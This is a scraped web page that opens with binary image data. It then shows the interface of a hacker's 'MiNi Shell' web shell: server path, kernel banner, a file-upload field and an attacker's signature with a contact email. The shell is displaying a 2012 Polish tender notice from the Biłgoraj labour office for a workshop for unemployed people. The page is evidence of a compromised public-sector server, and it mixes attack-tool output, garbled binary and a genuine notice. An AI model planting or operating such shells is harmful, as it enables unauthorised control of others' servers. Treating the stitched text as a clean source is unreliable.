JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120531/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120531/181982-N-2012.html

<p class="kh_header"><b>Biłgoraj: usługa w zakresie organizacji warsztatu dla osób bezrobotnych</b><br>
<b>Numer ogłoszenia: 181982 - 2012; data zamieszczenia: 31.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Biłgoraju , ul. Bohaterów Monte Cassino 38, 23-400 Biłgoraj, woj. lubelskie, tel. 084 6850000, faks 084 6861671.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.bilgoraj.ibip.pl/public/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa w zakresie organizacji warsztatu dla osób bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Warsztat powinien obejmować 16 godzin zajęć (tj. każdy uczestnik powinien odbyć 16 godzin zajęć). Zajęcia powinny odbywać się w czterech grupach po 14 osób każda. Zajęcia mają odbywać się przez dwa kolejne dni dla każdej grupy szkoleniowej. Dodatkowo każda z grup powinna zostać podzielona na dwie podgrupy po 7 osób, celem naprzemiennej realizacji modułów tj.
1.	pierwszego dnia pierwsza podgrupa (7 osób) realizuje  I moduł autoprezentacja, w tym  samym czasie druga podgrupa (7 osób) II moduł kreacja wizerunku,
2.	drugiego dnia pierwsza podgrupa (7 osób) realizuje  II moduł kreacja wizerunku, w tym samym czasie druga podgrupa (7 osób) I moduł autoprezentacja.
Program warsztatu powinien zawierać następujące zagadnienia:
1.	Moduł I Autoprezentacja (8 godzin) zajęcia teoretyczne:
1.1.	Pierwsze wrażenie a sukces zawodowy,
1.2.	Samoocena oraz odkrywanie mocnych i słabych stron,
1.3.	Bilans możliwości zawodowych,
1.4.	Asertywność - poznanie zasad i komunikatów asertywnych w realizacjach pracowniczych,
1.5.	Komunikacja interpersonalna,
1.6.	Przygotowanie do rozmowy kwalifikacyjnej, zasady prowadzenia rozmowy z pracodawcą,
1.7.	Przygotowanie profesjonalnego portfolio zawodowego (zestawu dokumentów aplikacyjnych).
2.	Moduł II Kreacja wizerunku (8 godzin) zajęcia praktyczne:
2.1.	Tworzenie profesjonalnego wizerunku osobistego i zawodowego,
2.2.	Podstawowe zasady etyki zawodowej,
2.3.	Kontrast i harmonia w makijażu i garderobie,
2.4.	Dobór garderoby,  dodatków, makijażu i fryzury  adekwatnie do określonej sytuacji,
2.5.	Podkreślenie atutów sylwetki  i osobowości,
2.6.	Sztuka korygowania mankamentów figury,
2.7.	Kreacja wizerunku w ramach indywidualnych konsultacji ze specjalistami przy użyciu profesjonalnego sprzętu do stylizacji i wizażu.
Zajęcia mogą odbywać się od poniedziałku do piątku (za wyjątkiem dni ustawowo wolnych od pracy)  w godzinach 8:00 - 19:00, maksymalnie po 8 godzin lekcyjnych (45 min.) dziennie przedzielone 15 minutowymi przerwami oraz 60 minutową przerwą w każdym dniu na obiad. Miejsce odbywania warsztatu: poza terenem miasta Biłgoraj, odległość maksymalna do 40 km od Biłgoraja. Sale wykładowe i miejsca przeznaczone do prowadzenia zajęć praktycznych powinny spełniać wymogi bhp i p.poż., uregulowane w przepisach odrębnych.
Każda osoba powinna otrzymać:
1.	materiały szkoleniowe:
1.1.	podręcznik dotyczący poszukiwania pracy, nie może być to podręcznik kopiowany,
1.2.	długopis,
1.3.	notatnik formatu A4 (blok w kratkę klejony min. 100 kartek format A4)
1.4.	teczkę z rączką do przechowywania i transportu dokumentów,
1.5.	nośnik pamięci Pendrive min. 2GB;
2.	wyżywienie:
2.1.	1 x śniadanie (drugiego dnia),
2.2.	2 x dwudaniowe obiady,
2.3.	2 x kolacja (pierwszego i drugiego dnia)
2.4.	serwis kawowy każdego dnia;
3.	nocleg (w pokojach jedno lub dwuosobowych);
4.	transport uczestników do miejsca odbywania warsztatu (pierwszego dnia) i z powrotem do Biłgoraja (ostatniego dnia);
5.	ubezpieczenie od następstw nieszczęśliwych wypadków powstałych w związku z warsztatem oraz w drodze do miejsca warsztatu i z powrotem dla każdego uczestnika na kwotę minimum 10 000,00 zł.;
6.	indywidualne konsultacje ze specjalistami z zakresu doradztwa wizerunku (fryzjer, kosmetyczka, wizażysta/stylista) w ramach punktu 1.4.2.
7.	profesjonalnie wykonany zestaw dokumentów aplikacyjnych - portfolio zawodowe w ramach punktu 1.4.1.7. 
Wykonawca powinien zapewnić do prawidłowej realizacji warsztatów:
1.	 specjalistów z zakresu doradztwa wizerunku (fryzjer, kosmetyczka, wizażysta/stylista),
2.	zestaw materiałów i narzędzi zapewniających stworzenie indywidualnego wizerunku uczestników warsztatów,
3.	wykonanie profesjonalnego zdjęcia do portfolio zawodowego,
4.	test /Czy jesteś asertywny/,
5.	sprzęt audio wizualny umożliwiający projekcje filmów DVD (zestaw filmów szkoleniowych tj. /Autoprezentacja - mowa ciała w praktyce/ i /Asertywność/ zapewni Zamawiający).
Wykonawca zobowiązany jest przeprowadzić dwie ankiety na rozpoczęcie i zakończenie warsztatu. Treść ankiet określi Zamawiający. Podana w ofercie cena powinna obejmować ogólny koszt warsztatu za wszystkich uczestników oraz koszt jednej osobogodziny warsztatu (jedna osobogodzina warsztatu = cena warsztatu/liczba godzin warsztatu/liczba osób na warsztacie).
Termin realizacji zamówienia (wymagany): pomiędzy: 15.06.2012 a 15.07.2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, iż w ciągu ostatnich 3 lat przed upływem terminu składania ofert wykonał należycie co najmniej 3 grupowe szkolenia lub warsztaty dla co najmniej 10 osób dorosłych każde</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, iż dysponuje osobami posiadającymi co najmniej 6 miesięczne doświadczenie w nauczaniu w zakresie objętym przedmiotem zamówienia lub takimi, które przeprowadziły co najmniej 3 szkolenia lub warsztaty w zakresie objętym przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Kwalifikacje i doświadczenie kadry prowadzącej zajęcia - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają zmianę umowy, gdy zmiany te są korzystne dla zamawiającego, a w szczególności dotyczą:
1)	terminu wykonania zamówienia,
2)	harmonogramu,
3)	liczby godzin,
4)	ceny,
5)	numeru konta,
6)	osób wykonujących zamówienie,
7)	miejsca wykonania zamówienia,
8)	programu,
9)	ankiety oceniającej,
10)	osób wyznaczonych do współpracy z Zamawiającym i Wykonawcą,
11)	sposobu organizacji,
12)	materiałów szkoleniowych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.bilgoraj.ibip.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Boh Monte Cassino 38 p.103 23 - 400 Biłgoraj.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2012 godzina 09:00, miejsce: ul. Boh Monte Cassino 38 p.102 23 - 400 Biłgoraj.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com